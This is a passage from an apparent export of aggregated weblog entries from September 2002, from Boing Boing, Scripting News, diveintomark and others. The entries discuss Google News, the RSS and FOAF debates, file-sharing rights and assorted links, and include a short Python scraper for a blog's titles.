    chance that audiences will buy something from that playlist alone - because 
    that's all you'll be able to find out there.  Link[1] Discuss[2][1] http://slashdot.org/article.pl?sid=02/09/23/133228
[2] http://www.quicktopic.com/boing/H/8nEQCxZaP8U6X
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:9:11:14PM
Date: Tue, 24 Sep 2002 04:11:14 GMTEd Cone[1]: "I told my grandmother goodbye."[1] http://radio.weblogs.com/0107946/2002/09/24.html#a186
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481660
Date: Not suppliedGoogle has seriously revamped Google News -- the system automatically gathers 
today's top stories and finds all the various coverage of them. It's really 
excellent. Link[1] Discuss[2] (_Thanks, Nate!_)[1] http://news.google.com/
[2] http://www.quicktopic.com/boing/H/miaubJpDGAnsd
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:4:54:52PM
Date: Mon, 23 Sep 2002 23:54:52 GMTPaul Everitt: Interop in the Bazaar[1].[1] http://advogato.com/article/544.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:3:56:54PM
Date: Mon, 23 Sep 2002 22:56:54 GMTCNN Headline News: To Blog or not to Blog[1].[1] http://www.cnn.com/2002/SHOWBIZ/09/20/hln.hot.buzz.blog/index.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:11:28AM
Date: Mon, 23 Sep 2002 15:11:28 GMTAfter posting my comment yesterday about next things[1] I want to do, I'm 
starting to get job offers. Hey I wasn't expecting that. But I like it I like 
it. Especially in this stinkin economy. On the other hand can you imagine _me_ 
with a job? ";-&gt;"[1] http://scriptingnews.userland.com/backissues/2002/09/22#whatsNextForDave
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482924
Date: Not supplied[IMG: http://jw.servebeer.com:8080/images/bigE/thumbnails/tn_P0002140.JPG] Jeff 
writes: "Goats with enormous testicles, and a life-sized cow sculpted from 
butter. Pictures from Massachusett's Eastern States Expo this weekend. Anyone 
know the purpose of those overgrown goat gonads?" Link[1] Discuss[2] (_Thanks, 
Jeff[3]!_) 
[1] http://jw.servebeer.com:8080/images/bigE/index.html
[2] http://www.quicktopic.com/boing/H/KbCG2e32dyMsB
[3] http://jw.servebeer.com:8080
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:9:19:32AM
Date: Mon, 23 Sep 2002 16:19:32 GMTShelley Powers raises[1] some interesting questions re whether RDF has a place 
in syndication. She says that RDF is trying to build a persistent database (aka 
the Semantic Web) and RSS is trying to flow news that has a short lifespan. I 
had not heard this point before. It's worth thinking about. [1] http://weblog.burningbird.net/archives/000541.php
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:10:34:18AM
Date: Mon, 23 Sep 2002 17:34:18 GMTI've been hearing a lot about FOAF, which is an acronym for Friend Of A Friend. 
It's an RDF-based file format that lets you walk a network of people who are 
friends. It's a lot like a network of blogrolls[1]. [1] http://radio.outliners.com/stories/storyReader$85
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482231
Date: Not suppliedHomeland Alert is an OS X app that puts a little beacon in your menubar, 
telling you what the current nationwide alert status is -- just in case you 
don't have enough free-floating anxiety in your life. Link[1] Discuss[2] (_
Thanks, Jon[3]!_)[1] http://www.exittoshell.com/products/
[2] http://www.quicktopic.com/boing/H/G4yCjfq37i2
[3] http://www.talkstink.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/23.html#now_heavily_medicated
Date: 2002-09-23T16:11:02-05:00Trust me when I tell you that heavy medication and RDF do not mix. Here is a 
list of things I intend to re-read once the fog lifts: - _Phil Ringnalda_: Using FOAF relationships[1] and Just say no to Trackback in 
index.html[2]. 
- _Les Orchard_: Per-post comment RSS feed[3]. 
- _Phil Wainewright_: The bare necessities of RSS[4] and What to do about RDF
[5]. The beginning of an RSS 2.0 best practices document. 
- _Jonathon Delacour_: Trying to score a goal[6]. â€œAs the best and the 
brightest focus on the possibilities of FOAF, I turned my attention to 
yesterday's news: RSS.â€ No, RSS will always be today's news. Get it? 
Today's newzzz... Never mind. 
- Comments on Ben Hammersley's Friend of a Friend[7]. Various ways to link to a 
FOAF file from an RSS feed. 
- _Nicholas Chase_: The Web's future: XHTML 2.0[8]. We're losing backward 
compatibility, isn't that great? Well, he seems to think so. 
- mod_cc[9], a module for including copyright information in RDF documents such 
as RSS 1.0 feeds, and, I hope, FOAF files. 
- _Shelley Powers_: Who is your audience, and what are you trying to 
accomplish?[10] Addressing the growing identity crisis on the RSS-DEV mailing 
list[11]. Also the comments on Shelley's article[12]. 
- _Ian Hickson_: Pingback 1.0[13]. â€œThe best thing about this idea is 
that unlike similar schemes like TrackBack, it is totally transparent to both 
users.â€ 
- New software helps in building of accessible web sites[14]. A press release 
for a new edition of LIFT[15], which I have never used. 
- Forget Mars bars, Twinkies now the deep-fried treat[16]. â€œThe secret to 
making a deep-fried Twinkie, he says, is to place it in the fridge first to 
give it more stability. He then rolls it in flour, covers it with batter ... 
and plunks it into the oil.â€ [1]  http://philringnalda.com/archives/002324.php
[2]  http://philringnalda.com/archives/002329.php
[3]  http://www.decafbad.com/news_archives/000290.phtml
[4]  http://howto.looselycoupled.com/blog/2002_09_15_dy.htm
[5]  http://howto.looselycoupled.com/blog/2002_09_22_dy.htm#85480973
[6]  http://weblog.delacour.net/archives/000707.html
[7]  http://rss.benhammersley.com/archives/001387.html
[8]  http://www-106.ibm.com/developerworks/library/wa-xhtml/?n-wa-9192
[9]  http://web.resource.org/rss/1.0/modules/cc/
[10] http://weblog.burningbird.net/archives/000541.php
[11] http://groups.yahoo.com/group/rss-dev/
[12] http://burningbird.net/cgi-bin/mt-comments.cgi?entry_id=541
[13] http://ln.hixie.ch/?start=1032794857&amp;count=1
[14] http://maccentral.macworld.com/news/0209/23.usable.php
[15] http://www.usablenet.com/
[16] http://www.globeandmail.com/servlet/ArticleNews/PEstory/TGAM/20020923/UFATTN/Headlines/headdex/headdexInternational_temp/13/13/22/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/23.html#the_semantic_web_makes_me_sick
Date: 2002-09-23T09:27:30-05:00No, really. My sinus infection, which appeared to be gone, flared up again over 
the weekend in the nastiest way, and I am now coughing up dark mucus and doing 
other things that probably don't bear repeating in a public forum. I have the 
10:15 doctor's appointment that I should have made last round, had I not 
convinced myself that â€œit's not that badâ€ and trudged through it 
all without prescription drugs. I'm not making the same mistake this time. I'll 
be back this afternoon. My email problems of yesterday have been resolved. You can once again reach me 
at my normal address, f8dy@diveintomark.org. Kevin Burton[1] emailed me with another way to link to a FOAF file from my RSS 
feed. It looks easier than previous suggestions, and it has the advantage of 
being able to use it from an RSS 1.0 or 2.0 feed, but I worry about all these 
variations. Just as in real life, where people can use different words that 
mean essentially the same thing, in the Semantic Web programs can use different 
vocabularies to express the same statements. That's great for producers, not so 
great for consumers who have to make sense of it all. For each domain (RSS feeds, FOAF files, whatever), somebody (or some group) 
needs to come along and document best practices. We need better _goal-oriented_ 
documentation. We have a lot of reference documentation, task-oriented 
documentation, but very little that documents that larger picture and answers 
questions written in English. â€œHow do I include personal information in 
my RSS feed?â€ is a goal-oriented question. â€œCreate a FOAF file 
using this tool and then insert this line at this location in your RSS 
feedâ€ (with as many examples as necessary) is a goal-oriented answer. 
Anything less is like trying to master a foreign language by reading a 
dictionary.[1] http://www.peerfear.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482211
Date: Not suppliedRobert L Forward, a giant of hard science fiction, has died at 70 of brain 
cancer. Link[1] Discuss[2] (_Thanks, Michael[3]!_)[1] http://www.plokta.com/pnn/stories.php?story=02/09/23/1517277
[2] http://www.quicktopic.com/boing/H/UcZdn6NE74aGQ
[3] http://www.michaelbernstein.com/weblog/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:19:16AM
Date: Mon, 23 Sep 2002 15:19:16 GMTGoogle PR sends a message that they have a new News service[1]. Maybe I'm slow 
this morning, or maybe I'm spoiled, but what's the big deal. I thought they 
already had this. My personal aggregator[2] is better, it shows me what I'm 
interested in, it's not one size fits all. Help me figure this out. I'm sure 
there's something innovative here, I just don't see it.[1] http://news.google.com/
[2] http://radio.userland.com/newsAggregator
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481649
Date: Not suppliedJavawalk is a coffee-oriented walking-tour of San Francisco.     Javawalk is a two-hour walk in the city center. We start at Union Square 
    and wind through Chinatown, Jackson Square and North Beach, the city's 
    Italian district. While we cover the city's coffee roots (much more 
    significant than Seattle's!) and coffeehouse culture (think beatnik), we 
    also spend some time on San Francisco's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year-round in the city by the Bay. 
    Lucky us!  Link[1] Discuss[2] (_Thanks, Paul!_)[1] http://www.javawalk.com/javawalk.html
[2] http://www.quicktopic.com/boing/H/hgG7TyTTrKj
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:47:06AM
Date: Mon, 23 Sep 2002 15:47:06 GMTNews.Com: Google search gets newsier[1].[1] http://rss.com.com/2100-1023-958927.html?type=ptâˆ‚=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#rss_revolt
Date: 2002-09-25T00:38:31-05:00_Anil Dash_: XML version 1.0[1]. â€œWhy isn't there a way to syndicate my 
words without butchering the way they look?â€ Several people protested 
last week by changing their weblog templates to something like this[2]. Jason 
Levine has more links[3] to those involved. I spoke with one of the people who 
implemented it, and she claims it wasn't a protest as such, more of an inside 
joke. Point taken: the entire point of an aggregator (and syndication in 
general) is to make everyone's words look the same. Counterpoint: the default 
in most weblog systems is to only publish excerpts in RSS feeds; nobody's 
forcing you to publish full posts. This would probably be a good place to 
insert a Zen quote about attachment, but my mind is too fuzzy to find it. _Timothy Appnel_: More FFKAR, RDF, and FOAF[4]. FFKAR is â€œthe format 
formerly known as RSSâ€. Sam has already implemented it[5]. _Nicholas Avenell_: ESF[6]. â€œAre you also fed up with the continuing war 
between RSS 0.9* and 1.0 and 2.0 and whatever else they invent today? Me too. 
So today I invented the Epistula Syndication Format. ESF. It isn't XML. It 
isn't RDF. It's just data.â€ Sam[7] would love it, then. But Movable Type 
doesn't support outputting dates in Unix timestamp format[8], which could be an 
impediment to mainstream acceptance. _Shelley Powers_: Consumer Rights and RSS[9]. â€œI'm not buying into RSS 
0.9x. I'm not buying into RSS 2.0. I'm not buying into RSS 1.0. I changed my 
RSS 0.91 and RSS 1.0 templates to read the following:â€     *RSS not supported here*     This weblog does not support RSS 0.9x, RSS 2.0, or RSS 1.0. If you wish to 
    view entries, may I suggest that you visit the weblog, and save your fast 
    skimming for the New York Times and Wall Street Journal. I'm sure this is some sort of DMCA violation or something, but here goes:     import urllib, re; print "\n TITLE: Burningbird    \n http://weblog.burningbird.net/\n en-us\n \n" + "\n".join(["TITLE: %s    %s" % t for t in re.compile(r'dc:title="(.*?)"\s*dc:identifier="(.*?)"', 
    re.DOTALL).findall(urllib.urlopen('http://weblog.burningbird.net/').read())]) 
    + "" [1] http://www.dashes.com/anil/index.php?archives/003183.php
[2] http://www.dashes.com/anil/xmlindex.php
[3] http://q.queso.com/index.php?archives/001000.php
[4] http://www.mplode.com/tima/archives/000107.html
[5] http://www.intertwingly.net/blog/840.html
[6] http://www.aquarionics.com/nodes/view.php?name=esf
[7] http://www.intertwingly.net/blog/
[8] http://www.movabletype.org/docs/mtmanual_tags.html#date tag formats
[9] http://weblog.burningbird.net/archives/000544.php
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:3:59:56PM
Date: Tue, 24 Sep 2002 22:59:56 GMTBruce Loebrich[1] has scraped RSS feeds for Google news, and a RSS 2.0 success 
story. In other words, it's okay to use the features in 2.0. We're doing it at 
UserLand and so is Bruce.[1] http://radio.weblogs.com/0104308/2002/09/24.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000614
Date: 2002-09-24T11:03:09-06:00I need a lawyer willing to argue that not-for-profit file sharing is fair use. 
I've got a plan. Napster: Work in Progress[1] -- that's new. They're also selling merchandise. MP3 Is Not a Crime[2] is a weblog covering the attacks on our rights. Dave Winer says he's not afraid to defend our rights[3]. _Yes! Who else?_ I will now refer to file sharing networks as "fair use networks"
like my limewire fair use network client.. or the kazaa fair use network..[1] http://www.napster.com/
[2] http://www.mp3isnotacrime.org/
[3] http://scriptingnews.userland.com/backissues/2002/09/24#When:8:35:25AM
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:41:50AM
Date: Tue, 24 Sep 2002 18:41:50 GMTNews.Com[1]: "Linux is a serious competitor," said Ballmer.[1] http://rss.com.com/2100-1001-959165.html?type=ptâˆ‚=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#stark_raving_sane
Date: 2002-09-24T22:05:32-05:00_Sam Ruby_: Stark raving mad[1].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Jakarta's Lucene, and then a python script pings weblogs.com 
    and blo.gs. Tom Stoppard (_Rosencrantz and Guildenstern are Dead_):     Guildenstern: â€œA man talking sense to himself is no madder than a man 
    talking nonsense not to himself.â€
    Rosencrantz: â€œOr just as mad.â€
    Guildenstern: â€œOr just as mad.â€
    Rosencrantz: â€œAnd he does both.â€
    Guildenstern: â€œSo there you are.â€
    Rosencrantz: â€œStark raving sane.â€ [1] http://www.intertwingly.net/blog/844.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.oblomovka.com/entries/2002/09/24#1032870720
Date: 2002-09-24T05:32:00-0700There are a few net innovations that have far greater ramifications than you 
would, at first hearing, expect them to. Napster, at heart just IRC with a UI, 
was one. Google News[1] is another. In its first day, I've already noticed: - The front page changes its editorial stance depending on where the earth's 
terminator[2] is. So in the evening on the West Coast, Google News is lead by 
the South China Morning Post, and various Asian english-language papers. By the 
late evening, the BBC and European papers are kicking in. 
- The site may be created by algorithms - but what about the choice of sites? 
The most arbitrary dividing line I see in Google's coverage is what is a news 
site, and what isn't. Slashdot[3] is, for instance, as well as some very 
obscure[4] newspapers. What about Blues News[5] or Scripting News[6], though? 
- Big companies spend mucho money paying "clipping services" that send them 
copies of any press coverage they receive. Clipping services are going to have 
to find some added value, very[7] very[8] quickly. [1] http://news.google.com/
[2] http://www.concentric.net/~marsface/glossary.htm#sectT
    The
sunrise-sunset line dividing the day and night halves of the Moon or a
planet.
[3] http://www.slashdot.org/
[4] http://www.eveningnews24.co.uk/
[5] http://www.bluesnews.com/
[6] http://www.scripting.com/
[7] http://news.google.com/news?hl=en&amp;q=%22Danny+O%27Brien%22&amp;btnG=Google+Search
[8] http://news.google.com/news?hl=en&amp;q=www.ntk.net&amp;btnG=Google+Search
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#light_reading
Date: 2002-09-24T10:46:15-05:00- _Phil Ringnalda_: Putting on the brakes[1]. â€œSo, the answer to the 
question that started this whole project, "what is the RDF in RSS 1.0 good 
for?" is two things: it's good for someone who has an infinitely large database 
that can be queried infinitely fast by a schema-aware program, or it's good for 
writing a schema-aware aggregator that can try to figure out what it should do 
with new elements that it hasn't seen before. That's actually an interesting 
project with some potential for success, but at this point I'm sick of the 
whole thing, so I'll leave that project for someone else.â€ 
- _Aaron Swartz_: TRAMP: Makes RDF look like Python data structures[2]. 
â€œRDF/XML got you down? Tired of having to go through contortions to deal 
with data? Want to write Python and be standards-compatible at the same time? 
Need a module to implement the psuedo-code you had on your slides? TRAMP may or 
may not be the answer to these problems!â€ Complete with an example of 
parsing FOAF files. 
- _Dan Connolly_: HyperRDF: Using XHTML Authoring Tools with XSLT to produce 
RDF schemas[3]. â€œXML syntax is a little tedious, but lots of people are 
evidently willing and able of editing it by hand. RDF adds another layer of 
tedium, but there are still a few folks willing to write it by hand. I make 
heavy use of reification/quoting in my representation of logical formulas in 
RDF. This adds another layer of tedium that I find unmanageable, and I have 
been writing XML/SGML/HTML by hand for 10 years.â€ Also includes a cogent 
explanation of the obscure profile attribute in HTML. [1] http://philringnalda.com/archives/002330.php
[2] http://www.aaronsw.com/2002/tramp
[3] http://www.w3.org/2000/07/hs78/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:07:06PM
Date: Wed, 25 Sep 2002 03:07:06 GMTSam Ruby[1]: "Yup, I'm a sick puppy." _Me too!_[1] http://www.intertwingly.net/blog/844.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:14:24PM
Date: Wed, 25 Sep 2002 03:14:24 GMTNote to self: Read the pingback spec[1]. Form opinion.[1] http://www.hixie.ch/specs/pingback/pingback
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:35:25AM
Date: Tue, 24 Sep 2002 15:35:25 GMTAaron Swartz[1]: "If everyone is afraid to speak, who will defend our right to 
download?" _I'm not afraid._[1] http://www.aaronsw.com/weblog/000613
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:9:13:33AM
Date: Tue, 24 Sep 2002 16:13:33 GMTLest anyone doubt that Brent[1] has a good heart. "I laughed, because here's 
the irony -- on this site, on my own personal weblog, Radio UserLand rather 
than NetNewsWire is the most-used aggregator."[1] http://inessential.com/2002/09/21.php
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:5:47:50PM
Date: Wed, 25 Sep 2002 00:47:50 GMTDotcom Scoop[1]: "CNET's Download.com is set to introduce a new program for its 
Download.com software portal. Beginning Sept. 30, software vendors will be 
charged a fee to upload their wares. There is also a monthly-package to get 
better placement on the site."[1] http://www.dotcomscoop.com/article.php?sid=366
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:21:06AM
Date: Tue, 24 Sep 2002 15:21:06 GMTIowa[1]: "There was frost outside this morning!"[1] http://iowa.weblogger.com/2002/09/24
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:10:02:01AM
Date: Tue, 24 Sep 2002 17:02:01 GMTMacNet Journal reports[1] that OmniOutliner will support OPML[2] soon. That's 
very good news[3] indeed. [1] http://www.whiterabbits.com/MacNetJournal/2002/09/23.html#a2282
[2] http://www.opml.org/
[3] http://www.omnigroup.com/mailman/archive/omnioutliner-users/2002-September/000402.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:7:38:08AM
Date: Tue, 24 Sep 2002 14:38:08 GMT9/2/00[1]: "In the overworked world of Web development, there's no time to 
study, there's only time to do."[1] http://davenet.userland.com/2000/09/02/whatToDoAboutRss#rssIsAboutSimplicity
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:10:21:41AM
Date: Tue, 24 Sep 2002 17:21:41 GMTRay Ozzie: Software Platform Dynamics[1].[1] http://www.ozzie.net/blog/stories/2002/09/24/softwarePlatformDynamics.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:4:10:18AM
Date: Tue, 24 Sep 2002 11:10:18 GMTWired[1]: "An urgent business proposition and requests for urgent assistance 
from a so-called Nigerian official were heeded by a Detroit bank secretary in 
the latest example of how the ubiquitous e-mail scam actually works."[1] http://www.wired.com/news/business/0,1367,55329,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:27:17AM
Date: Tue, 24 Sep 2002 18:27:17 GMTJeremy Allaire: Wholistic Web Services[1].[1] http://radio.weblogs.com/0113297/stories/2002/09/24/wholisticWebServices.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:11:46:59AM
Date: Tue, 24 Sep 2002 18:46:59 GMTScoble[1]: "I'm just not that excited by much that Microsoft is doing."[1] http://radio.weblogs.com/0001011/2002/09/24.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:05:13AM
Date: Tue, 24 Sep 2002 15:05:13 GMTNY Times[1]: "Google's automated editors appeared to match the work of human 
competitors."[1] http://www.nytimes.com/2002/09/24/technology/24GOOG.html?ex=1033444800&amp;en=0557fe246dd68b12&amp;ei=5007&amp;partner=USERLAND
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#parallels
Date: 2002-09-24T20:38:57-05:00_Jeffrey Zeldman_: OS X Blues update[1].     A couple of intellectuals have pointed out parallels between the rigidity 
    of OS X, which derives its power from Unix and XML, and the rules of 
    standards-based web development, which also compels you to do things the 
    right way instead of using five different non-standard hacks. The parallel 
    is not without merit. Building web pages the right way is hard at first, 
    but once you get it, you never want to go back. Regardless, we miss OS 9's 
    flexibility and ease of use, and a metric ton of logic doesn't offset that 
    feeling of loss. [1] http://www.zeldman.com/daily/0902a.html#osxbluesupdate
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#dvd_stills
Date: 2002-09-24T13:49:41-05:00DVD Capture 1.0[1] â€œis a helper application for the Apple DVD Player. It 
enables the user to take screen captures of the DVD Player Viewer in window and 
full screen mode. The captures can be saved to a file or placed on the 
clipboard.â€[1] http://www.versiontracker.com/dyn/moreinfo/macosx/16324
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:8:53:42AM
Date: Tue, 24 Sep 2002 15:53:42 GMTLooks like Google did a deal to index the NY Times. If you do this news search
[1], and mouse over the link, you'll see there's a partner attribute on the 
URL, like the ones in our links[2]. What are the implications of this? Here's 
one. Martin Nisenholtz may now have a _chance_ of winning his bet[3] with me. 
";-&gt;"[1] http://news.google.com/news?hl=en&amp;q=%22new+york+times%22+blog
[2] http://www.nytimes.com/2002/09/24/technology/24GOOG.html?ex=1033444800&amp;en=0557fe246dd68b12&amp;ei=5007&amp;partner=USERLAND
[3] http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;safe=off&amp;q=nisenholtz+winer&amp;btnG=Google+Search
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:4:19:42AM
Date: Tue, 24 Sep 2002 11:19:42 GMTLance Knobel[1] of Davos Newbies does a quick review of Tony Blair's case 
against Sadam Hussein.[1] http://www.davosnewbies.com/2002/09/24#theDossier
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85488621
Date: Not suppliedBarbie has been made over as a Bond girl:      [IMG: http://www.craphound.com/images/bondbarbie.jpg] As James Bond, Ken 
    has matured nicely with rooted hair, with slight silvering at his temples, 
    wearing a midnight blue tuxedo, and authentic recreation of the classic tux 
    by Brioni, the famed clothier. Linda Hemming, the award winning costume 
    designer in charge of this year's James Bond film, outfits Barbie doll. She 
    wears a blood red gown with a glittering gold lace overlay and a gauzy red 
    shawl with a gold filigree design. Her gown is cut up the side to reveal 
    lots of leg as well as not so discreet hip strap that anchors Barbie's cell 
    phone. The set is slated for release in November, to coincide with the 
    premiere of "Die Another Day," the new James Bond film. Bond, James Bond, 
    meet Barbie, just Barbie...  Link[1] Discuss[2] (_Thanks Derek!_)[1] http://www.barbiebazaar.com/featured.htm
[2] http://www.quicktopic.com/boing/H/jsxte7PqRiA
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485739
Date: Not suppliedFor UK#400,000, a bioresearcher will map your personal genome for you. As 
geneticists discover more markers for congenital diseases, you can compare them 
to your genome and learn what you're in for in your lifetime -- heart disease, 
cancer, baldness, compulsive hand-washing... Link[1] Discuss[2] (_Thanks, Alan!
_)[1] http://timesofindia.indiatimes.com/cms.dll/articleshow?artid=23099123
[2] http://www.quicktopic.com/boing/H/86aYt8PFwKE6
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85487893
Date: Not suppliedI've put up a page called "12 Reasons to Pre-Order Down and Out in the Magic 
Kingdom," with blurbs by twelve people telling you why they think you should 
buy it. Here're the blurbers:  -  Bruce Sterling 
-  Lawrence Lessig 
-  Kelly Link 
-  Mark Frauenfelder 
-  Karl Schroeder 
-  Rudy Rucker 
-  Howard Rheingold 
-  Douglas Rushkoff 
-  Tim O'Reilly 
-  Bruce Schneier 
-  Gardner Dozois 
-  Mitch Kapor And the blurbs are great, like this one:     Wow! Disney imagineering meets nanotechnology, the reputation economy, and 
    Ray Kurzweil's transhuman future. As much fun as Neal Stephenson's Snow 
    Crash, and as packed with mind bending ideas about social changes cascading 
    from the frontiers of science.     Tim O'Reilly
    Publisher and Founder, O'Reilly and Associates (_NB: This used to be 13 reasons, but I just realized that I somehow ended up 
with a phantom entry from Dan GIllmor, who, on closer examination, it appears I 
failed to deliver a copy to, like a total idiot. My apologies, Dan_) Link[1] 
Discuss[2][1] http://www.craphound.com/blurbs.html
[2] http://www.quicktopic.com/boing/H/ukUEeLcfy8zH
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485619
Date: Not suppliedEFF is looking for a few good slogans! We're getting some banners made up to 
place on P2P network clients, with slogans like, "P2P Has a Posse." We need 
more. Mail your suggestions to kevin@eff.org or post to the discuss link. Link
[1] Discuss[2][1] mailto:kevin@eff.org
[2] http://www.quicktopic.com/boing/H/ybym9WMbmNDEx
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85486499
Date: Not suppliedA new addition to the parodical genre of 419 ("Nigerian Money Laundry Scam") 
letters from members of the Shrub establishment, following up on Cheney's 
letter[1].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lock-box funds 
    and the bulk of the 2001 budget surplus, could not be accessed by me or my 
    children, due to agreements made between the socialist government of the 
    USA and Swiss bank regulators. They seized our ranch in Crawford, Texas and 
    now use it to teach homosexualist propaganda to schoolchildren.  Link[2] Discuss[3] (_Thanks, Stefan!_)[1] http://atrios.blogspot.com/2002_08_18_atrios_archive.html#80547516
[2] http://brainslug.org/archives/000224.html#000224
[3] http://www.quicktopic.com/boing/H/7zkxnLj3i6Da
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485727
Date: Not suppliedDVD Capture is an AppleScript for OS X that captures screen-grabs from DVDs. OS 
X normally disables screen-capture while the DVD player is running (even if it 
isn't visible!). I have some home movies on DVD that I'd love to get stills 
from, but I can't -- the DVD licensing board has forced Apple to break my 
hardware in such a way as to prevent me from doing something completely lawful, 
to make sure that I never, ever grab a frame out of _Police Academy n - 1_. 
Nice to see that independent software authors are willing to un-break my gear 
for me. Link[1] Discuss[2] (_Thanks, Patrick[3]!_)[1] http://www.versiontracker.com/dyn/moreinfo/macosx/16324
[2] http://www.quicktopic.com/boing/H/NmjEGYXDmqd
[3] http://www.patandkat.com/pat/weblog/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85486452
Date: Not suppliedGregor sez:     ENRON Corp material assets go on the block 7 AM CT TOMORROW, Wednesday, 
    9/25. First on the list is the giant, steel, Enron "E" (Lot "E"), followed 
    by tons of cool tech. 50 inch plasma panels, desktop LC Displays, boxes of 
    Palm PDAs or Nokia cell phones, network stuff, wireless stuff, desktop 
    computers, servers, monitors, printers, plotters, in both massive lots, and 
    individually! Oh yeah, Enron trade-show trinkets too, by the cartload.     The catch: You have to either go to Texas to pick up the stuff, or arrange 
    with an approved 3rd party vendor (list provided on the web site) to have 
    it picked, packed and shipped for you.     Go! Register! Bid! Consume!  Link[1] Discuss[2] (_Thanks, Gregor!_)[1] http://www.dovebid.com/Auctions/auction1480/catalog/browsewebcast_1480_50_1.html
[2] http://www.quicktopic.com/boing/H/K95wm7U4E85
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485985
Date: Not suppliedThe Horror Writers of America are hosting a charity auction on eBay to raise 
money for American literacy charities.     Among the items up for auction: a rare softcover advance copy (bound 
    galley) of Thomas Harris' The Silence of the Lambs issued by St. Martin's 
    Press in 1988; the first U.S. hardcover edition of Clive Barker's The 
    Damnation Game; and a bundle of limited-edition prints depicting scenes 
    from Stephen King novels such as Carrie and The Shining.  Link[1] Discuss[2][1] http://www.wired.com/news/culture/0,1284,55319,00.html
[2] http://www.quicktopic.com/boing/H/qWd2YRCqaFUqW
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485894
Date: Not suppliedBen Hammersley posts a parable about design specifications, showing the link 
between Roman Chariots and the Space Shuttle. It has the ring of something 
apocraphyl to me, but it's a good read, nevertheless.     The U.S. standard railroad gauge (distance between the rails) is 4 feet, 
    8.5 inches. That is an exceedingly odd number. Why was that gauge used? 
    Because that's the way they built them in England, and the U.S. railroads 
    were built by English expatriates.     Why did the English build them that way? Because the first rail lines were 
    built by the same people who built the pre-railroad tramways, and that's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it's false[1], but from their notes, it appears that it's actually 
